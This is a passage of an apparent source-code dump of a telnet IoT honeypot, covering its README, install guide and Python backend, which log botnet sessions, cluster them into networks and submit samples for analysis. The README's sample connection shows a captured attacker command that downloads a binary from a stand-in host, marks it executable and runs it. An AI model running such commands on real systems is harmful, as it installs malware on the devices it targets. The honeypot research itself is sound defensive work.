Repository: Phype/telnet-iot-honeypot Branch: master Commit: 5d32829a36b5 Files: 82 Total size: 309.8 KB Directory structure: gitextract_2jzluwq6/ ├── .gitignore ├── Dockerfile ├── INSTALL.md ├── README.md ├── backend/ │ ├── __init__.py │ ├── additionalinfo.py │ ├── authcontroller.py │ ├── backend.py │ ├── clientcontroller.py │ ├── cuckoo.py │ ├── db.py │ ├── ipdb/ │ │ ├── .gitignore │ │ ├── __init__.py │ │ └── ipdb.py │ ├── virustotal.py │ ├── virustotal_fill_db.py │ └── webcontroller.py ├── backend.py ├── config.dist.yaml ├── create_config.sh ├── create_docker.sh ├── honeypot/ │ ├── __init__.py │ ├── __main__.py │ ├── client.py │ ├── sampledb_client.py │ ├── session.py │ ├── shell/ │ │ ├── __init__.py │ │ ├── commands/ │ │ │ ├── __init__.py │ │ │ ├── base.py │ │ │ ├── binary.py │ │ │ ├── cmd_util.py │ │ │ ├── shell.py │ │ │ ├── shellcode.py │ │ │ ├── tftp.py │ │ │ └── wget.py │ │ ├── grammar.peg │ │ ├── grammar.py │ │ ├── shell.py │ │ ├── test.sh │ │ └── test.txt │ └── telnet.py ├── honeypot.py ├── html/ │ ├── .gitignore │ ├── admin.html │ ├── asn.html │ ├── common.js │ ├── connection.html │ ├── connectionlist-embed.html │ ├── connectionlist.html │ ├── countries.js │ ├── fancy/ │ │ ├── connhash/ │ │ │ └── index.html │ │ └── graph/ │ │ └── index.html │ ├── img/ │ │ ├── LICENSE │ │ └── flags/ │ │ └── LICENSE │ ├── index.html │ ├── js/ │ │ └── angular-vis.js │ ├── network.html │ ├── networks.html │ ├── overview.html │ ├── sample.html │ ├── sample.js │ ├── samples.html │ ├── tag.html │ ├── tags.html │ ├── url.html │ └── urls.html ├── requirements.txt ├── tftpy/ │ ├── TftpClient.py │ ├── TftpContexts.py │ ├── TftpPacketFactory.py │ ├── TftpPacketTypes.py │ ├── TftpServer.py │ ├── TftpShared.py │ ├── TftpStates.py │ └── __init__.py ├── util/ │ ├── __init__.py │ ├── config.py │ └── dbg.py └── vagrant/ ├── .gitignore ├── mariadb/ │ ├── Vagrantfile │ └── mysql.sh └── sqlite/ └── Vagrantfile ================================================ FILE CONTENTS 
================================================ ================================================ FILE: .gitignore ================================================ *.pyc *.db samples/ Mirai-Source-Code-master/ obf.py import-lost-conns.py import-length.py review-sampels.py *.kate-swp *.sql *.log config.yaml ================================================ FILE: Dockerfile ================================================ FROM python:2 WORKDIR /usr/src/app COPY ./requirements.txt ./ RUN pip install --no-cache-dir -r requirements.txt RUN pip install mysqlclient COPY . . RUN apt update && apt install -y sqlite3 ================================================ FILE: INSTALL.md ================================================ # Installation For installation instructions, go to section Manual installation. However, if you just want to get everything running, there is also a Vagrantfile. See Section Vagrant for that. # Vagrant There is a Vagrantfile in the folder vagrant/ you can use to just make a basic deployment with honeypot + backend + sqlite running. Install vagrant and the vagrant virtualbox provider, then go to the vagrant folder and type `vagrant up`. After a while the box should run a honeypot + backend available via port-forwarding at `http://localhost:5000/` and `telnet://localhost:2223`. # Manual installation confirmed to work with Ubuntu 16.04.2 LTS Install all requirements: ``` apt-get install -y python-pip libmysqlclient-dev python-mysqldb git sqlite3 git clone https://github.com/Phype/telnet-iot-honeypot.git cd telnet-iot-honeypot pip install -r requirements.txt ``` sudo apt-get install python-setuptools python-werkzeug \ python-flask python-flask-httpauth python-sqlalchemy \ python-requests python-decorator python-dnspython \ python-ipaddress python-simpleeval python-yaml If you want to use mysql, create a mysql database. Default mysql max key length is 767 bytes, so it is recommended to use latin1 charset, else the db setup will fail.
``` apt-get install mysql-server mysql-client sudo mysql_secure_installation mysql CREATE DATABASE telhoney CHARACTER SET latin1 COLLATE latin1_swedish_ci; grant all privileges on telhoney.* to telhoney@localhost identified by "YOUR_PASSWORD"; flush privileges; ``` ## Configuration This software consists of 2 components, a honeypot (client) and a backend (server). The honeypot will accept incoming telnet connections and may download samples which an adversary may try to download in the telnet session. When a session is closed, the honeypot will post all data about the connection to the backend using a REST-API. The configuration for both honeypot and backend is in the files `config.dist.yaml` and `config.yaml`. The `config.dist.yaml` contains the default config. If you want to change anything, change or create overriding entries in `config.yaml`. If you need documentation about the configuration, the file `config.dist.yaml` contains some comments. The REST-API requires authentication (HTTP Basic Auth). When the backend is started for the first time, it will create a "users" table in the database containing an "admin" user. The admin user's password is read from the configuration file. If this file is empty, it will be created with random credentials. *TL;DR*: The default config should just work; if you need the credentials for the admin user, see the file `config.yaml`. ## Running Create a config: bash create_config.sh Start the backend: python backend.py Now, start the honeypot: python honeypot.py Now, you can test the honeypot telnet 127.0.0.1 2223 ## HTML Frontend You can use the frontend by just opening the file html/index.html in your browser.
If you want to make the frontend publicly available, deploy the html/ folder to your webserver, or install one: ``` sudo apt-get install apache2 cd telnet-iot-honeypot cp -R html /var/www sudo chown www-data:www-data /var/www -R ``` ## Virustotal integration Please get your own virustotal key, since mine only allows for 4 API Req/min. For how to do this, see https://www.virustotal.com/de/faq/#virustotal-api When you got one, put it in your config.yaml and enable virustotal integration: vt_key: "GET_YOUR_OWN" submit_to_vt: true If you want to import virustotal reports of the collected samples, run (may have to restart because of db locks). *TODO*: test if this still works python virustotal_fill_db.py ================================================ FILE: README.md ================================================ ## Disclaimer This project is neither supported nor in development anymore. It is based on python2 which has reached its EOL in 2020 and uses dependencies which are getting harder to install over time. Use at your own risk! # Telnet IoT honeypot 'Python telnet honeypot for catching botnet binaries' This project implements a python telnet server trying to act as a honeypot for IoT Malware which spreads over horribly insecure default passwords on telnet servers on the internet. The honeypot works by emulating a shell environment, just like cowrie (https://github.com/micheloosterhof/cowrie). The aim of this project is primarily to automatically analyse Botnet connections and "map" Botnets by linking different connections and even Networks together. ## Architecture The application has a client/server architecture, with a client (the actual honeypot) accepting telnet connections and a server which receives information about connections and does the analysis. The backend server exposes a HTTP interface which is used to access the frontend as well as by the clients to push new Connection information to the backend.
## Automatic analysis The Backend uses 2 different mechanisms to automatically link connections: ### Networks Networks are discovered Botnets. A network is the set of all linked connections, urls and samples. Urls and samples are linked when they are used in a connection. Two connections are linked when both connections are received by the same honeypot client (multiple clients are supported!) and use the same credentials in a short period of time (default 2 minutes) or come from the same IP address. ### Malware Multiple networks are identified to use the same type of malware if the text entered during sessions of the networks are mostly the same. This comparison is done using a sort of "hash"-function which basically translates a session (or connection) into a sequence of words and then maps each word to a single byte so this resulting sequence of bytes can be easily searched. # Running The application has a config file named config.py. Samples are included for local and client/server deployments. ## Configuration The backend requires a SQL-database (default sqlite) which is initialized at first run. Before the first run you should generate an admin account which is used to generate more users. The admin account can also be directly used by a client to post connections. When more than one honeypot shall be connected, creating multiple users is recommended. bash create_config.sh Both client and backend will read the files `config.yaml` and `config.dist.yaml` to read configuration parameters. The `config.dist.yaml` file includes default values for all but admin user credentials and these parameters are overwritten by entries in the `config.yaml` file. ## Running the Server python backend.py ## Running the Client This project contains its own honeypot, however because of the client-server architecture, other honeypots can be used as well. ### Using the built-in honeypot python honeypot.py The client cannot be started without the server running.
To use a diffrent configuration for the client you can use the `-c` switch like this: python honeypot.py -c myconfig.yaml If you only want to check the honeypot functionality, you can start the client in interactive mode: python honeypot shell ### Using cowrie I wrote an output plugin for cowrie, which has much more features than the built in honeypot. If you want to use cowrie instead, checkout my fork which includes the output module here: https://github.com/Phype/cowrie . ## Opening the frontend After the server is started, open `http://127.0.0.1/` in your favorite browser. ## Sample Connection enable shell sh cat /proc/mounts; /bin/busybox PEGOK cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK nc; wget; /bin/busybox PEGOK (dd bs=52 count=1 if=.s || cat .s) /bin/busybox PEGOK rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit ## Images ![Screenshot 1](images/screen1.png) ![Screenshot 2](images/screen2.png) ![Screenshot 3](images/screen3.png) ================================================ FILE: backend/__init__.py ================================================ ================================================ FILE: backend/additionalinfo.py ================================================ import dns.resolver import ipaddress import urlparse import re import traceback import ipdb.ipdb def filter_ascii(string): string = ''.join(char for char in string if ord(char) < 128 and ord(char) > 32 or char in "\r\n ") return string def query_txt(cname): try: answer = dns.resolver.query(filter_ascii(cname), "TXT") for rr in answer.rrset: if rr.strings: return rr.strings[0] except Exception as e: traceback.print_exc() pass return None def query_a(cname): try: answer = dns.resolver.query(filter_ascii(cname), "A") for data in answer: if data.address: return data.address except: traceback.print_exc() pass return None def txt_to_ipinfo(txt): parts = txt.split("|") return { "asn": filter_ascii(parts[0].strip()), "ipblock": filter_ascii(parts[1].strip()), 
"country": filter_ascii(parts[2].strip()), "reg": filter_ascii(parts[3].strip()), "updated": filter_ascii(parts[4].strip()) } def txt_to_asinfo(txt): parts = txt.split("|") return { "asn": filter_ascii(parts[0].strip()), "country": filter_ascii(parts[1].strip()), "reg": filter_ascii(parts[2].strip()), "updated": filter_ascii(parts[3].strip()), "name": filter_ascii(parts[4].strip()) } def get_ip4_info(ip): oktets = ip.split(".") reverse = oktets[3] + "." + oktets[2] + "." + oktets[1] + "." + oktets[0] answer = query_txt(reverse + ".origin.asn.cymru.com") if answer: return txt_to_ipinfo(answer) return None def get_ip6_info(ip): ip = ipaddress.ip_address(unicode(ip)) ip = list(ip.exploded.replace(":", "")) ip.reverse() reverse = ".".join(ip) answer = query_txt(reverse + ".origin6.asn.cymru.com") if answer: return txt_to_ipinfo(answer) return None def get_ip_info(ip): is_v4 = "." in ip is_v6 = ":" in ip if is_v4: return get_ip4_info(ip) elif is_v6: return get_ip6_info(ip) else: print("Cannot parse ip " + ip) return None def get_asn_info(asn): answer = query_txt("AS" + str(asn) + ".asn.cymru.com") if answer: return txt_to_asinfo(answer) return None def get_url_info(url): try: parsed = urlparse.urlparse(url) netloc = parsed.netloc ip = None # IPv6 if "[" in netloc: netloc = re.match("\\[(.*)\\]", netloc).group(1) ip = netloc # IPv4 / domain name else: if ":" in netloc: netloc = re.match("(.*?):", netloc).group(1) if re.match("[a-zA-Z]", netloc): ip = query_a(netloc) else: ip = netloc return ip, get_ip_info(ip) except: traceback.print_exc() pass return None if __name__ == "__main__": print get_ip_info("79.220.249.125") print get_ip_info("2a00:1450:4001:81a::200e") print get_asn_info(3320) print get_url_info("http://google.com") print get_url_info("http://183.144.16.51:14722/.i") print get_url_info("http://[::1]:14722/.i") ================================================ FILE: backend/authcontroller.py ================================================ import os import 
hashlib import traceback import struct import json import time import additionalinfo import ipdb.ipdb from sqlalchemy import desc, func, and_, or_ from decorator import decorator from functools import wraps from simpleeval import simple_eval from argon2 import argon2_hash from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper from virustotal import Virustotal from cuckoo import Cuckoo from util.dbg import dbg from util.config import config from difflib import ndiff class AuthController: def __init__(self): self.session = None self.salt = config.get("backend_salt") self.checkInitializeDB() def pwhash(self, username, password): return argon2_hash(str(password), self.salt + str(username), buflen=32).encode("hex") @db_wrapper def checkInitializeDB(self): user = self.session.query(User).filter(User.id == 1).first() if user == None: admin_name = config.get("backend_user") admin_pass = config.get("backend_pass") print 'Creating admin user "' + admin_name + '" see config for password' self.addUser(admin_name, admin_pass, 1) @db_wrapper def getUser(self, username): user = self.session.query(User).filter(User.username == username).first() return user.json(depth=1) if user else None @db_wrapper def addUser(self, username, password, id=None): user = User(username=username, password=self.pwhash(username, password)) if id != None: user.id = id self.session.add(user) return user.json() @db_wrapper def checkAdmin(self, user): user = self.session.query(User).filter(User.username == user).first() if user == None: return False return user.id == 1 @db_wrapper def checkLogin(self, username, password): user = self.session.query(User).filter(User.username == username).first() if user == None: return False if self.pwhash(username, password) == user.password: return True else: return False ================================================ FILE: backend/backend.py ================================================ from flask import 
Flask, request, Response, redirect, send_from_directory from flask_httpauth import HTTPBasicAuth from flask_socketio import SocketIO auth = HTTPBasicAuth() from db import get_db from clientcontroller import ClientController from webcontroller import WebController from authcontroller import AuthController from util.config import config import os import json import base64 import time import signal app = Flask(__name__) ctrl = ClientController() web = WebController() authctrl = AuthController() socketio = SocketIO(app) app.debug = True def red(obj, attributes): if not obj: return None res = {} for a in attributes: if a in obj: res[a] = obj[a] return res ### # # Globals # ### SECS_PER_MONTH = 3600 * 24 * 31 @app.after_request def add_cors(response): response.headers["Access-Control-Allow-Origin"] = "*" response.headers["Access-Control-Allow-Methods"] = "GET, POST, PUT, DELETE" response.headers["Access-Control-Allow-Headers"] = "Authorization, Content-type" return response @auth.verify_password def verify_password(username, password): return authctrl.checkLogin(username, password) ### # # Index # ### @app.route('/') def send_index(): return redirect('/html/index.html') @app.route('/html/') def serve_static(filename): root_dir = os.getcwd() return send_from_directory(os.path.join(root_dir, 'html'), filename) ### # # Admin API # ### @app.route("/user/", methods = ["PUT"]) @auth.login_required def add_user(username): if authctrl.checkAdmin(auth.username()): user = request.json if user["username"] != username: return "username mismatch in url/data", 500 return json.dumps(authctrl.addUser(user["username"], user["password"])) else: return "Authorization required", 401 ### # # Upload API # ### @app.route("/login") @auth.login_required def test_login(): return "LOGIN OK" @app.route("/conns", methods = ["PUT"]) @auth.login_required def put_conn(): session = request.json session["backend_username"] = auth.username() print("--- PUT SESSION ---") print(json.dumps(session)) session 
= ctrl.put_session(session) socketio.emit('session', session) return json.dumps(session) @app.route("/sample/", methods = ["PUT"]) @auth.login_required def put_sample_info(sha256): sample = request.json return json.dumps(ctrl.put_sample_info(sample)) @app.route("/sample//update", methods = ["GET"]) @auth.login_required def update_sample(sha256): return json.dumps(ctrl.update_vt_result(sha256)) @app.route("/file", methods = ["POST"]) @auth.login_required def put_sample(): data = request.get_data() return json.dumps(ctrl.put_sample(data)) ### # # Public API # ### def fail(msg = "", code = 400): obj = {"ok" : False, "msg" : msg} return Response(json.dumps(obj), status=code, mimetype='application/json') ### Networks @app.route("/housekeeping", methods = ["GET"]) def housekeeping(): ctrl.do_housekeeping() return "DONE" @app.route("/networks", methods = ["GET"]) def get_networks(): return json.dumps(web.get_networks()) @app.route("/network/", methods = ["GET"]) def get_network(net_id): return json.dumps(web.get_network(net_id)) @app.route("/network//locations", methods = ["GET"]) def get_network_locations(net_id): now = int(time.time()) loc = web.get_connection_locations(now - SECS_PER_MONTH, now, int(net_id)) return json.dumps(loc) @app.route("/network//history", methods = ["GET"]) def get_network_history(net_id): not_before = request.args.get("not_before") not_after = request.args.get("not_after") if not_before == None or not_after == None: not_after = int(time.time()) not_before = not_after - SECS_PER_MONTH else: not_before = int(not_before) not_after = int(not_after) d = web.get_network_history(not_before, not_after, int(net_id)) return json.dumps(d) @app.route("/network/biggest_history", methods = ["GET"]) def get_network_biggest_history(): not_before = request.args.get("not_before") not_after = request.args.get("not_after") if not_before == None or not_after == None: not_after = int(time.time()) not_before = not_after - SECS_PER_MONTH else: not_before = 
int(not_before) not_after = int(not_after) d = web.get_biggest_networks_history(not_before, not_after) return json.dumps(d) ### Malwares @app.route("/malwares", methods = ["GET"]) def get_malwares(): return json.dumps(web.get_malwares()) ### Samples @app.route("/sample/") def get_sample(sha256): sample = web.get_sample(sha256) if sample: return json.dumps(sample) else: return "", 404 @app.route("/sample/newest") def get_newest_samples(): samples = web.get_newest_samples() return json.dumps(samples) ### Urls @app.route("/url/", methods = ["GET"]) def get_url(ref_enc): ref = base64.b64decode(ref_enc) print("\"" + ref_enc + "\" decodes to \"" + ref + "\"") url = web.get_url(ref) if url: return json.dumps(url) else: return "", 404 @app.route("/url/newest") def get_newest_urls(): urls = web.get_newest_urls() return json.dumps(urls) ### connections @app.route("/connection/") def get_connection(id): conn = web.get_connection(id) if conn: return json.dumps(conn) else: return "", 404 @app.route("/connections") def get_connections(): obj = {} allowed_keys = ["ipblock", "user", "password", "ip", "country", "asn_id", "network_id"] for k,v in request.args.iteritems(): if k in allowed_keys: obj[k] = v conn = web.get_connections(obj, request.args.get("older_than", None)) if conn: return json.dumps(conn) else: return "", 404 @app.route("/connections_fast") def get_connections_fast(): conn = web.get_connections_fast() if conn: return json.dumps(conn) else: return "", 404 @app.route("/connection/statistics/per_country") def get_country_stats(): stats = web.get_country_stats() return json.dumps(stats) @app.route("/connection/by_country/") def get_country_connections(country): older_than = request.args.get('older_than', None) stats = web.get_country_connections(country, older_than) return json.dumps(stats) @app.route("/connection/by_ip/") def get_ip_connections(ip): older_than = request.args.get('older_than', None) stats = web.get_ip_connections(ip, older_than) return 
json.dumps(stats) @app.route("/connection/newest") def get_newest_connections(): connections = web.get_newest_connections() return json.dumps(connections) @app.route("/connection/locations") def get_connection_locations(): now = int(time.time()) loc = web.get_connection_locations(now - SECS_PER_MONTH, now) return json.dumps(loc) ### Tags @app.route("/tag/") def get_tag(name): tag = web.get_tag(name) if tag: return json.dumps(tag) else: return "", 404 @app.route("/tags") def get_tags(): tags = web.get_tags() return json.dumps(tags) ### Hist @app.route("/connhashtree/") def connhash_tree(layers): return json.dumps(web.connhash_tree(int(layers))) ### ASN @app.route("/asn/") def get_asn(asn): info = web.get_asn(asn) if not info: return "", 404 return json.dumps(info) def run(): signal.signal(15, stop) app.run(host=config.get("http_addr"), port=config.get("http_port"),threaded=True) #socketio.run(app, host=config.get("http_addr"), port=config.get("http_port")) def stop(): print "asdasdasd" if __name__ == "__main__": run() ================================================ FILE: backend/clientcontroller.py ================================================ import os import hashlib import traceback import struct import json import time import socket import urlparse import random import additionalinfo import ipdb.ipdb from sqlalchemy import desc, func, and_, or_ from decorator import decorator from functools import wraps from simpleeval import simple_eval from argon2 import argon2_hash from db import get_db, filter_ascii, Sample, Connection, Url, ASN, Tag, User, Network, Malware, IPRange, db_wrapper from virustotal import Virustotal from cuckoo import Cuckoo from util.dbg import dbg from util.config import config from difflib import ndiff ANIMAL_NAMES = ["Boar","Stallion","Yak","Beaver","Salamander","Eagle Owl","Impala","Elephant","Chameleon","Argali","Lemur","Addax","Colt", 
"Whale","Dormouse","Budgerigar","Dugong","Squirrel","Okapi","Burro","Fish","Crocodile","Finch","Bison","Gazelle","Basilisk", "Puma","Rooster","Moose","Musk Deer","Thorny Devil","Gopher","Gnu","Panther","Porpoise","Lamb","Parakeet","Marmoset","Coati", "Alligator","Elk","Antelope","Kitten","Capybara","Mule","Mouse","Civet","Zebu","Horse","Bald Eagle","Raccoon","Pronghorn", "Parrot","Llama","Tapir","Duckbill Platypus","Cow","Ewe","Bighorn","Hedgehog","Crow","Mustang","Panda","Otter","Mare", "Goat","Dingo","Hog","Mongoose","Guanaco","Walrus","Springbok","Dog","Kangaroo","Badger","Fawn","Octopus","Buffalo","Doe", "Camel","Shrew","Lovebird","Gemsbok","Mink","Lynx","Wolverine","Fox","Gorilla","Silver Fox","Wolf","Ground Hog","Meerkat", "Pony","Highland Cow","Mynah Bird","Giraffe","Cougar","Eland","Ferret","Rhinoceros"] # Controls Actions perfomed by Honeypot Clients class ClientController: def __init__(self): self.session = None if config.get("submit_to_vt"): self.vt = Virustotal(config.get("vt_key", optional=True)) else: self.vt = None self.cuckoo = Cuckoo(config) self.do_ip_to_asn_resolution = False self.ip2asn = config.get("ip_to_asn_resolution", optional=True, default=True) if self.ip2asn == "offline": self.do_ip_to_asn_resolution = True self.fill_db_ipranges() if self.ip2asn == "online": self.do_ip_to_asn_resolution = True @db_wrapper def _get_asn(self, asn_id): asn_obj = self.session.query(ASN).filter(ASN.asn == asn_id).first() if asn_obj: return asn_obj else: asn_info = additionalinfo.get_asn_info(asn_id) if asn_info: asn_obj = ASN(asn=asn_id, name=asn_info['name'], reg=asn_info['reg'], country=asn_info['country']) self.session.add(asn_obj) return asn_obj return None def calc_connhash_similiarity(self, h1, h2): l = min(len(h1), len(h2)) r = 0 for i in range(0, l): r += int(h1[i] != h2[i]) if l == 0: return 0 return float(r)/float(l) def calc_connhash(self, stream): output = "" for event in stream: if event["in"]: line = event["data"] line = line.strip() parts = 
line.split(" ") for part in parts: part_hash = chr(hash(part) % 0xFF) output += part_hash # Max db len is 256, half because of hex encoding return output[:120] @db_wrapper def fill_db_ipranges(self): if self.session.query(IPRange.ip_min).count() != 0: return print "Filling IPRange Tables" asntable = ipdb.ipdb.get_asn() progress = 0 for row in ipdb.ipdb.get_geo_iter(): progress += 1 if progress % 1000 == 0: self.session.commit() self.session.flush() print str(100.0 * float(row[0]) / 4294967296.0) + "% / " + str(100.0 * progress / 3315466) + "%" ip = IPRange(ip_min = int(row[0]), ip_max=int(row[1])) ip.country = row[2] ip.region = row[4] ip.city = row[5] ip.zipcode = row[8] ip.timezone = row[9] ip.latitude = float(row[6]) ip.longitude = float(row[7]) asn_data = asntable.find_int(ip.ip_min) if asn_data: asn_id = int(asn_data[3]) asn_db = self.session.query(ASN).filter(ASN.asn == asn_id).first() if asn_db == None: asn_db = ASN(asn = asn_id, name = asn_data[4], country=ip.country) self.session.add(asn_db) ip.asn = asn_db # Dont add session if we cannot find an asn for it self.session.add(ip) print "IPranges loaded" @db_wrapper def get_ip_range_offline(self, ip): ip_int = ipdb.ipdb.ipstr2int(ip) range = self.session.query(IPRange).filter(and_(IPRange.ip_min <= ip_int, ip_int <= IPRange.ip_max)).first() return range def get_ip_range_online(self, ip): addinfo = additionalinfo.get_ip_info(ip) if addinfo: # TODO: Ugly hack range = type('',(object,),{})() range.country = addinfo["country"] range.city = "Unknown" range.latitude = 0 range.longitude = 0 range.asn_id = int(addinfo["asn"]) range.asn = self._get_asn(range.asn_id) range.cidr = addinfo["ipblock"] return range else: return None def get_ip_range(self, ip): if self.ip2asn == "online": return self.get_ip_range_online(ip) else: return self.get_ip_range_offline(ip) def get_url_info(self, url): parsed = urlparse.urlparse(url) host = parsed.netloc.split(':')[0] if host[0].isdigit(): ip = host else: try: ip = 
socket.gethostbyname(host) except: return None range = self.get_ip_range(ip) return ip, range @db_wrapper def do_housekeeping(self): for malware in self.session.query(Malware).all(): malware.name = random.choice(ANIMAL_NAMES) # rebuild nb_firstconns if False: net_cache = {} for conn in self.session.query(Connection).all(): if len(conn.conns_before) == 0: if conn.network_id in net_cache: net_cache[conn.network_id] += 1 else: net_cache[conn.network_id] = 1 for network in self.session.query(Network).all(): if network.id in net_cache: network.nb_firstconns = net_cache[network.id] else: network.nb_firstconns = 0 print "Net " + str(network.id) + ": " + str(network.nb_firstconns) @db_wrapper def put_session(self, session): connhash = self.calc_connhash(session["stream"]).encode("hex") backend_user = self.session.query(User).filter( User.username == session["backend_username"]).first() conn = Connection(ip=session["ip"], user=session["user"], date=session["date"], password=session["pass"], stream=json.dumps(session["stream"]), connhash=connhash, backend_user_id=backend_user.id) conn.user = filter_ascii(conn.user) conn.password = filter_ascii(conn.password) if self.do_ip_to_asn_resolution: range = self.get_ip_range(conn.ip) if range: conn.country = range.country conn.city = range.city conn.lat = range.latitude conn.lon = range.longitude conn.asn = range.asn self.session.add(conn) self.session.flush() # to get id network_id = None samples = [] urls = [] for sample_json in session["samples"]: # Ignore junk - may clean up the db a bit if sample_json["length"] < 2000: continue sample, url = self.create_url_sample(sample_json) if sample: if network_id == None and sample.network_id != None: network_id = sample.network_id samples.append(sample) if url: if network_id == None and url.network_id != None: network_id = url.network_id conn.urls.append(url) urls.append(url) # Find previous connections # A connection is associated when: # - same honeypot/user # - connection happened as 
long as 120s before # - same client ip OR same username/password combo assoc_timediff = 120 assoc_timediff_sameip = 3600 previous_conns = (self.session.query(Connection). filter( or_( and_( Connection.date > (conn.date - assoc_timediff), Connection.user == conn.user, Connection.password == conn.password ), and_( Connection.date > (conn.date - assoc_timediff_sameip), Connection.ip == conn.ip ) ), Connection.backend_user_id == conn.backend_user_id, Connection.id != conn.id).all()) for prev in previous_conns: if network_id == None and prev.network_id != None: network_id = prev.network_id conn.conns_before.append(prev) # Check connection against all tags tags = self.session.query(Tag).all() for tag in tags: json_obj = conn.json(depth = 0) json_obj["text_combined"] = filter_ascii(json_obj["text_combined"]) if simple_eval(tag.code, names=json_obj) == True: self.db.link_conn_tag(conn.id, tag.id) # Only create new networks for connections with urls or associtaed conns, # to prevent the creation of thousands of networks # NOTE: only conns with network == NULL will get their network updated # later so whe should only create a network where we cannot easily # change it later haslogin = conn.user != None and conn.user != "" if (len(conn.urls) > 0 or len(previous_conns) > 0) and network_id == None and haslogin: print(" --- create network --- ") network_id = self.create_network().id # Update network on self conn.network_id = network_id # Update network on all added Urls for url in urls: if url.network_id == None: url.network_id = network_id # Update network on all added Samples for sample in samples: if sample.network_id == None: sample.network_id = network_id # Update network on all previous connections withut one if network_id != None: for prev in previous_conns: if prev.network_id == None: prev.network_id = network_id # Update number of first conns on network if len(prev.conns_before) == 0: conn.network.nb_firstconns += 1 self.session.flush() # Check for Malware type # only 
if our network exists AND has no malware associated if conn.network != None and conn.network.malware == None: # Find connections with similar connhash similar_conns = (self.session.query(Connection) .filter(func.length(Connection.connhash) == len(connhash)) .all()) min_sim = 2 min_conn = None for similar in similar_conns: if similar.network_id != None: c1 = connhash.decode("hex") c2 = similar.connhash.decode("hex") sim = self.calc_connhash_similiarity(c1, c2) if sim < min_sim and similar.network.malware != None: min_sim = sim min_conn = similar # 0.9: 90% or more words in session are equal # think this is probably the same kind of malware # doesn't need to be the same botnet though! if min_sim < 0.9: conn.network.malware = min_conn.network.malware else: conn.network.malware = Malware() conn.network.malware.name = random.choice(ANIMAL_NAMES) self.session.add(conn.network.malware) self.session.flush() # Update network number of first connections if len(previous_conns) == 0 and conn.network_id != None: conn.network.nb_firstconns += 1 return conn.json(depth=1) @db_wrapper def create_network(self): net = Network() self.session.add(net) self.session.flush() return net def create_url_sample(self, f): url = self.session.query(Url).filter(Url.url==f["url"]).first() if url == None: url_ip = None url_asn = None url_country = None if self.do_ip_to_asn_resolution: url_ip, url_range = self.get_url_info(f["url"]) if url_range: url_asn = url_range.asn_id url_country = url_range.country url = Url(url=f["url"], date=f["date"], ip=url_ip, asn_id=url_asn, country=url_country) self.session.add(url) if f["sha256"] != None: sample = self.session.query(Sample).filter(Sample.sha256 == f["sha256"]).first() if sample == None: result = None try: if self.vt != None: vtobj = self.vt.query_hash_sha256(f["sha256"]) if vtobj: result = str(vtobj["positives"]) + "/" + str(vtobj["total"]) + " " + self.vt.get_best_result(vtobj) except: pass sample = Sample(sha256=f["sha256"], name=f["name"], 
    @db_wrapper
    def put_sample(self, data):
        # Store a raw sample blob: content-address it by SHA-256, persist it
        # through the DB layer (which writes the file and records its path),
        # then hand it to at most one analysis backend (Cuckoo preferred over
        # VirusTotal).
        sha256 = hashlib.sha256(data).hexdigest()
        self.db.put_sample_data(sha256, data)
        if config.get("cuckoo_enabled"):
            # NOTE(review): config.dist.yaml ships `cuckoo_enabled: false,` --
            # the trailing comma makes YAML parse it as the string "false,",
            # which is truthy here. Confirm deployed configs use a bare bool.
            self.cuckoo.upload(os.path.join(config.get("sample_dir"), sha256), sha256)
        elif config.get("submit_to_vt"):
            self.vt.upload_file(os.path.join(config.get("sample_dir"), sha256), sha256)
requests.get(urljoin(self.url_base, "/files/view/sha256/{}".format(sha256)), verify=False, auth=HTTPBasicAuth(self.api_user,self.api_passwd), timeout=60) if res and res.ok and res.status_code == 200: print("Sample found in Sandbox, with ID: {}".format(res.json().get("sample", {}).get("id", 0))) return True else: return False except Exception as e: print(e) return False def postfile(self, artifact, fileName): """ Send a file to Cuckoo """ files = {"file": (fileName, open(artifact, "rb").read())} try: res = requests.post(urljoin(self.url_base, "tasks/create/file").encode("utf-8"), files=files, auth=HTTPBasicAuth( self.api_user, self.api_passwd ), verify=False) if res and res.ok: print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) else: print("Cuckoo Request failed: {}".format(res.status_code)) except Exception as e: print("Cuckoo Request failed: {}".format(e)) return def posturl(self, scanUrl): """ Send a URL to Cuckoo """ data = {"url": scanUrl} try: res = requests.post(urljoin(self.url_base, "tasks/create/url").encode("utf-8"), data=data, auth=HTTPBasicAuth( self.api_user, self.api_passwd ), verify=False) if res and res.ok: print("Cuckoo Request: {}, Task created with ID: {}".format(res.status_code, res.json()["task_id"])) else: print("Cuckoo Request failed: {}".format(res.status_code)) except Exception as e: print("Cuckoo Request failed: {}".format(e)) return ================================================ FILE: backend/db.py ================================================ import time import json import sqlalchemy import random from decorator import decorator from sqlalchemy import Table, Column, BigInteger, Integer, Float, String, MetaData, ForeignKey, Text, Index from sqlalchemy.sql import select, join, insert, text from sqlalchemy.orm import relationship, sessionmaker, scoped_session from sqlalchemy.pool import QueuePool from sqlalchemy.ext.declarative import declarative_base from util.config import config 
@decorator
def db_wrapper(func, *args, **kwargs):
    """Method decorator that guarantees an open DB session.

    If the object (args[0], i.e. `self`) already carries a session -- a
    nested @db_wrapper call -- run `func` inside it and let the outermost
    wrapper handle commit/teardown.  Otherwise open a fresh session for the
    duration of the call and always tear it down afterwards.
    """
    self = args[0]
    if self.session:
        return func(*args, **kwargs)
    else:
        self.db = get_db()
        self.session = self.db.sess
        try:
            ret = func(*args, **kwargs)
            # The original placed commit()/flush() AFTER `return`, making
            # them dead code (only db.end() in `finally` committed). Commit
            # explicitly before returning, as intended.
            self.session.commit()
            self.session.flush()
            return ret
        finally:
            self.db.end()
            self.db = None
            self.session = None
class Network(Base):
    """A botnet "network": a cluster of related connections, URLs and samples."""
    __tablename__ = 'network'

    id = Column('id', Integer, primary_key=True)

    samples = relationship("Sample", back_populates="network")
    urls = relationship("Url", back_populates="network")
    connections = relationship("Connection", back_populates="network")

    # Number of connections in this network recorded without any associated
    # predecessor connection ("first" connections).
    nb_firstconns = Column('nb_firstconns', Integer, default=0)

    malware_id = Column('malware', None, ForeignKey('malware.id'))
    malware = relationship("Malware", back_populates="networks")

    def json(self, depth=0):
        # depth == 0: counts only; depth > 0: lists of identifiers.
        return {
            "id": self.id,
            "samples": len(self.samples) if depth == 0 else map(lambda i: i.sha256, self.samples),
